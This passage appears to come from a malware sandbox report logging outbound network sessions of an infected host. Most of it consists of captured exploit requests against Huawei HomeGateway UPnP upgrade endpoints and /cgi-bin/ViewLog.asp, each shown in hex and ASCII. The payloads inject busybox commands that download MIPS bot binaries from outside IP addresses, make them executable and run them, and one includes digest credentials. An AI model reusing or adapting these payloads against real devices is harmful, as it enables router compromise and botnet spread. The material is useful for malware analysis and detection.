                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:10.758255959 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:42.244920969 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              148192.168.2.145948831.171.228.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.954087973 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              149192.168.2.144297894.122.22.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:40.778960943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              150192.168.2.145557031.136.252.318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.183276892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.767436028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.887381077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.159349918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.767179012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:58.726721048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.669959068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.532403946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              151192.168.2.143968885.208.120.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.220135927 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.441847086 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:48:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              152192.168.2.145545094.120.212.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.220834017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              153192.168.2.145987294.122.72.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:41.221175909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
